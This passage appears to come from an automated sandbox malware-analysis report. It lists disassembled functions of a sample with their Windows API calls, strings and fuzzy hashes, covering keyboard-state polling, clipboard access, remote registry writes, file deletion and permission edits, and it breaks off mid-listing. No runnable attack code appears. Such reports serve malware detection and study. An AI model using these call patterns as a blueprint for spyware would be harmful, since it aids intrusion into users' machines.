RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00850BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,0085F910,00000000,?,00000000,?,?), ref: 00850C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00850C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00850D1D
RegCloseKey.ADVAPI32(?), ref: 0085103D
RegCloseKey.ADVAPI32(00000000), ref: 0085104A

Strings

REG_BINARY, xrefs: 00850FD8
REG_SZ, xrefs: 00850D5B
REG_EXPAND_SZ, xrefs: 00850CBA
REG_DWORD, xrefs: 00850F0E
REG_MULTI_SZ, xrefs: 00850E05
REG_QWORD, xrefs: 00850F8B

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 2f1d1c8d7b9a376308ba258aef6822a083c2be1ff95d17a705af6cbef1c61e0e
Instruction ID: bccad4ee6f2ece88525765d7883eb9747fc44de958e7e00ff921f90a24015be8
Opcode Fuzzy Hash: 2f1d1c8d7b9a376308ba258aef6822a083c2be1ff95d17a705af6cbef1c61e0e
Instruction Fuzzy Hash: 50022875204611DFCB14EF14C899A2AB7E5FF88724F04885DF99A9B3A2CB34ED45CB81

Function 0085C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfilenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

DragQueryPoint.SHELL32(?,?), ref: 0085C917

Part of subcall function 0085ADF1: ClientToScreen.USER32(?,?), ref: 0085AE1A
Part of subcall function 0085ADF1: GetWindowRect.USER32(?,?), ref: 0085AE90
Part of subcall function 0085ADF1: PtInRect.USER32(?,?,0085C304), ref: 0085AEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 0085C980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0085C98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0085C9AE
_wcscat.LIBCMT ref: 0085C9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0085C9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 0085CA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 0085CA25
SendMessageW.USER32(?,000000B1,?,?), ref: 0085CA47
DragFinish.SHELL32(?), ref: 0085CA4E
NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0085CB41

Strings

@GUI_DROPID, xrefs: 0085CA6E
@GUI_DRAGFILE, xrefs: 0085CAF0
@GUI_DRAGID, xrefs: 0085CAB9

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 2166380349-3440237614
Opcode ID: a9253343c581b75e5e4a3b2e5afc87c83a96710d1a9574c6c05e72c417e23eb9
Instruction ID: 9c783c506709bbc21bd634d3dd884b26992245830caf9cc51e23833013db77b2
Opcode Fuzzy Hash: a9253343c581b75e5e4a3b2e5afc87c83a96710d1a9574c6c05e72c417e23eb9
Instruction Fuzzy Hash: DD615E71108301AFC711EF64CC89D9BBBF8FF98751F04092EF691922A1EB749A49CB52

Function 0083F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0083F37E
_wcscmp.LIBCMT ref: 0083F393
_wcscmp.LIBCMT ref: 0083F3AA

Part of subcall function 008345C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008345DC

FindNextFileW.KERNEL32(00000000,?), ref: 0083F3D9
FindClose.KERNEL32(00000000), ref: 0083F3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 0083F400
_wcscmp.LIBCMT ref: 0083F427
_wcscmp.LIBCMT ref: 0083F43E
SetCurrentDirectoryW.KERNEL32(?), ref: 0083F450
SetCurrentDirectoryW.KERNEL32(0088A5A0), ref: 0083F46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 0083F478
FindClose.KERNEL32(00000000), ref: 0083F485
FindClose.KERNEL32(00000000), ref: 0083F497

Strings

*.*, xrefs: 0083F3FB

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: f82b0851ebd99c8f0bbd76588d02390164e39618c39e65aa37b5216b8de45e6a
Instruction ID: 2d8b06274567241cccb330caa7f8a24484466a1161579b7481da4c7abb393183
Opcode Fuzzy Hash: f82b0851ebd99c8f0bbd76588d02390164e39618c39e65aa37b5216b8de45e6a
Instruction Fuzzy Hash: 2131D7719012196BDB10ABA4EC88ADF77ACFF85365F100175FA10E32A2D778DE44CAE4

Function 0085C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0085C4EC
GetFocus.USER32 ref: 0085C4FC
GetDlgCtrlID.USER32(00000000), ref: 0085C507
_memset.LIBCMT ref: 0085C632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0085C65D
GetMenuItemCount.USER32(?), ref: 0085C67D
GetMenuItemID.USER32(?,00000000), ref: 0085C690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0085C6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0085C70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0085C744
NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0085C779

Strings

0, xrefs: 0085C62A

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
String ID: 0
API String ID: 3616455698-4108050209
Opcode ID: 03f31a0735f11b1ebcd4450b8e15aec61c00552590c69d39003bcdf02c90e433
Instruction ID: 32002ea743e7d7f3e77ee138808725d15298403e5ef58c47bb5642d6fde06fb7
Opcode Fuzzy Hash: 03f31a0735f11b1ebcd4450b8e15aec61c00552590c69d39003bcdf02c90e433
Instruction Fuzzy Hash: 1F816974208305AFDB10DF28C884A6BBBE8FB98356F04452EF995D7291D770D909CFA2

Function 008281F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0082874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00828766
Part of subcall function 0082874A: GetLastError.KERNEL32(?,0082822A,?,?,?), ref: 00828770
Part of subcall function 0082874A: GetProcessHeap.KERNEL32(00000008,?,?,0082822A,?,?,?), ref: 0082877F
Part of subcall function 0082874A: RtlAllocateHeap.NTDLL(00000000,?,0082822A), ref: 00828786
Part of subcall function 0082874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0082879D

Part of subcall function 008287E7: GetProcessHeap.KERNEL32(00000008,00828240,00000000,00000000,?,00828240,?), ref: 008287F3
Part of subcall function 008287E7: RtlAllocateHeap.NTDLL(00000000,?,00828240), ref: 008287FA
Part of subcall function 008287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00828240,?), ref: 0082880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0082825B
_memset.LIBCMT ref: 00828270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0082828F
GetLengthSid.ADVAPI32(?), ref: 008282A0
GetAce.ADVAPI32(?,00000000,?), ref: 008282DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008282F9
GetLengthSid.ADVAPI32(?), ref: 00828316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00828325
RtlAllocateHeap.NTDLL(00000000), ref: 0082832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0082834D
CopySid.ADVAPI32(00000000), ref: 00828354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00828385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008283AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 008283BF

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: ef0554ffddd5ef9c4770e8975d694b4ba38bec570ccb22fd099919bb8f61c380
Instruction ID: 2eb29490fe1d257eca01896f7c56e20381a71b2fba35c28739f951c1b5382aae
Opcode Fuzzy Hash: ef0554ffddd5ef9c4770e8975d694b4ba38bec570ccb22fd099919bb8f61c380
Instruction Fuzzy Hash: 08615771901219EFDF00DFA4EC88AEEBBB9FF04701F188129E915E7291DB359A45CB60

Function 007E6843 Relevance: 19.6, Strings: 15, Instructions: 883COMMON

Download Yara Rule

Strings

UCP), xrefs: 00821546
Oa~, xrefs: 00821888, 0082192F, 008219DD
BSR_ANYCRLF), xrefs: 00821757
NO_AUTO_POSSESS), xrefs: 00821567
LIMIT_RECURSION=, xrefs: 00821635
LF), xrefs: 008216DD
UTF16), xrefs: 00821508
UTF), xrefs: 00821533
NO_START_OPT), xrefs: 00821588
ANY), xrefs: 00821717
LIMIT_MATCH=, xrefs: 008215A9
ANYCRLF), xrefs: 00821734
BSR_UNICODE), xrefs: 00821771
CR), xrefs: 008216C0
CRLF), xrefs: 008216FA

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa~$UCP)$UTF)$UTF16)
API String ID: 0-1095596525
Opcode ID: 4b1daa46c748f47c81b1a99ba2e5878df8b6de507bac715d5576e1d0374cf12e
Instruction ID: 9af42249cf9b07a2c15ecea094559f2a9435fd32f6a67f42b493ce1d0f3e60af
Opcode Fuzzy Hash: 4b1daa46c748f47c81b1a99ba2e5878df8b6de507bac715d5576e1d0374cf12e
Instruction Fuzzy Hash: 7272B571E01269DBDF14CF59D8847AEB7B5FF68310F24816AE909EB284E7349D81CB90

Function 00850665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00850038,?,?), ref: 008510BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00850737

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008507D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0085086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00850AAD
RegCloseKey.ADVAPI32(00000000), ref: 00850ABA

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: e791014f048665e82e85dbfa6a3a978f9f06b227dd9d13b3194225d650b83f64
Instruction ID: 0570f4e97f8ddce50617e3e1987f2271291c439749460ec79205938d707fd884
Opcode Fuzzy Hash: e791014f048665e82e85dbfa6a3a978f9f06b227dd9d13b3194225d650b83f64
Instruction Fuzzy Hash: 0BE13C31204310AFCB14DF28C895E6ABBF5FF89714B04896DF94ADB2A2DB34E905CB51

Function 00830219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00830241
GetAsyncKeyState.USER32(000000A0), ref: 008302C2
GetKeyState.USER32(000000A0), ref: 008302DD
GetAsyncKeyState.USER32(000000A1), ref: 008302F7
GetKeyState.USER32(000000A1), ref: 0083030C
GetAsyncKeyState.USER32(00000011), ref: 00830324
GetKeyState.USER32(00000011), ref: 00830336
GetAsyncKeyState.USER32(00000012), ref: 0083034E
GetKeyState.USER32(00000012), ref: 00830360
GetAsyncKeyState.USER32(0000005B), ref: 00830378
GetKeyState.USER32(0000005B), ref: 0083038A

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 564f985930e219ed3ae578cc917f336b8ec46cddf97b4f1338fca402dd666be4
Instruction ID: 2a2a8751fcecd9705ee3639156880f0303571dfd45390a974361f890a74e1bb6
Opcode Fuzzy Hash: 564f985930e219ed3ae578cc917f336b8ec46cddf97b4f1338fca402dd666be4
Instruction Fuzzy Hash: 284188645087C96EFF319B6488283A6BEA1FB91345F08419DD5C6C72C3E7D459C48FE2

Function 00844458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0084447F
EmptyClipboard.USER32 ref: 00844485
GlobalAlloc.KERNEL32(00000002,?), ref: 0084449A
CloseClipboard.USER32 ref: 00844539

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 6e5d89d9d1a402ab325393b6c65f5f501bbda6f10c098929ce348ff4e62270c8
Instruction ID: e793e29bb01398b659be6a5ef1b0025670c465d1130ce46398bec042190f0f60
Opcode Fuzzy Hash: 6e5d89d9d1a402ab325393b6c65f5f501bbda6f10c098929ce348ff4e62270c8
Instruction Fuzzy Hash: B921B235201224DFDB10AF64EC09B6E7BA8FF54715F10802AFA06DB2B2DB38AC00CB55

Function 00833A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 007D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D48A1,?,?,007D37C0,?), ref: 007D48CE

Part of subcall function 00834CD3: GetFileAttributesW.KERNEL32(?,00833947), ref: 00834CD4

FindFirstFileW.KERNEL32(?,?), ref: 00833ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00833B87
MoveFileW.KERNEL32(?,?), ref: 00833B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00833BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 00833BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00833BF5

Strings

\*.*, xrefs: 00833A8A, 00833A93, 00833AA8

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 71bd014e1b756462ffc327024a35db892428ce2d43eb99ab8a0c92f1299f37d9
Instruction ID: 3b456125218a2a1706aef57145e5b9effdb37e8a896ea6e9b823855559b3a05e
Opcode Fuzzy Hash: 71bd014e1b756462ffc327024a35db892428ce2d43eb99ab8a0c92f1299f37d9
Instruction Fuzzy Hash: 21518E3180525D9BCF15EBA0CE969EDB778BF54310F24416AE442B7192EF346F09CBA1

Function 007E4140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON

Download Yara Rule

Strings

Oa~, xrefs: 007E4984, 00818173
VUUU, xrefs: 007E44DB
VUUU, xrefs: 007E4520
ERCP, xrefs: 007E421F
VUUU, xrefs: 007E44ED
VUUU, xrefs: 00817B0C

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID:
String ID: ERCP$Oa~$VUUU$VUUU$VUUU$VUUU
API String ID: 0-3237024780
Opcode ID: 9035f90117577ce41e872e0c49684b18bc65b858679c5acc4684ec86fc3dcf00
Instruction ID: 12fb568e9303452455ecd48f6454bb201118fce5d7eefd28d3cbb04caf47bf41
Opcode Fuzzy Hash: 9035f90117577ce41e872e0c49684b18bc65b858679c5acc4684ec86fc3dcf00
Instruction Fuzzy Hash: ADA26C70A0529ACBDF24CF59C9447EEB7B5FF58314F2481A9D856A7280E7389EC1CB80

Function 0083F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0083F6AB
Sleep.KERNEL32(0000000A), ref: 0083F6DB
_wcscmp.LIBCMT ref: 0083F6EF
_wcscmp.LIBCMT ref: 0083F70A
FindNextFileW.KERNEL32(?,?), ref: 0083F7A8
FindClose.KERNEL32(00000000), ref: 0083F7BE

Strings

*.*, xrefs: 0083F690

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 70698c9749dcbd27bffe78dc8402c26c187c751eef6a9a2ebf215d4bfdbb3ee0
Instruction ID: 3e886fc7adc8e685dbea854a818f9145c1a667ba062eb74d806ef2d29580b05d
Opcode Fuzzy Hash: 70698c9749dcbd27bffe78dc8402c26c187c751eef6a9a2ebf215d4bfdbb3ee0
Instruction Fuzzy Hash: BE418E71D0021A9BDF15EF64CC89AEEBBB4FF45310F144566E914E22A2EB349E44CBD0

Function 0085D74C Relevance: 12.3, APIs: 8, Instructions: 257windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

GetSystemMetrics.USER32(0000000F), ref: 0085D78A
GetSystemMetrics.USER32(0000000F), ref: 0085D7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0085D9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0085DA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0085DA24
ShowWindow.USER32(00000003,00000000), ref: 0085DA43
InvalidateRect.USER32(?,00000000,00000001), ref: 0085DA68
NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 0085DA8B

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
